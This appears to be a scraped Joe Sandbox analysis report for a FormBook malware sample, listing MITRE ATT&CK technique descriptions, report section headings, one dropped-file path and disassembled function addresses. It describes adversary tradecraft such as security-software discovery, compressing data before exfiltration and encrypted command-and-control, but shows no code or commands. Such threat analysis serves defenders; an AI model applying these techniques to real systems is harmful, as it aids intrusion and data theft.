Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report S22Ls0H4Sz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
S22Ls0H4Sz.exe

Function 0039A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Function 0039A44A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
filenativeCOMMON

Function 0038ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 0039A34A Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Function 0039A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0039A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 0039A47A Relevance: 1.5, APIs: 1, Instructions: 23
nativeCOMMON

Function 0039A480 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 00389AA0 Relevance: .1, Instructions: 92
COMMON

Function 0039A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Function 00388308 Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Function 00388310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Function 0039A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 0039A7C0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Function 0039A6A0 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 0039A652 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Function 0039A765 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Function 00389E50 Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Function 0039EB5F Relevance: 1.5, Strings: 1, Instructions: 279
COMMONCrypto

Function 0039EB62 Relevance: 1.5, Strings: 1, Instructions: 239
COMMONCrypto

Function 0039DD5C Relevance: 1.5, Strings: 1, Instructions: 238
COMMONCrypto

Function 0039DA11 Relevance: 1.4, Strings: 1, Instructions: 159
COMMONCrypto

Function 00382FB0 Relevance: .4, Instructions: 435
COMMONCrypto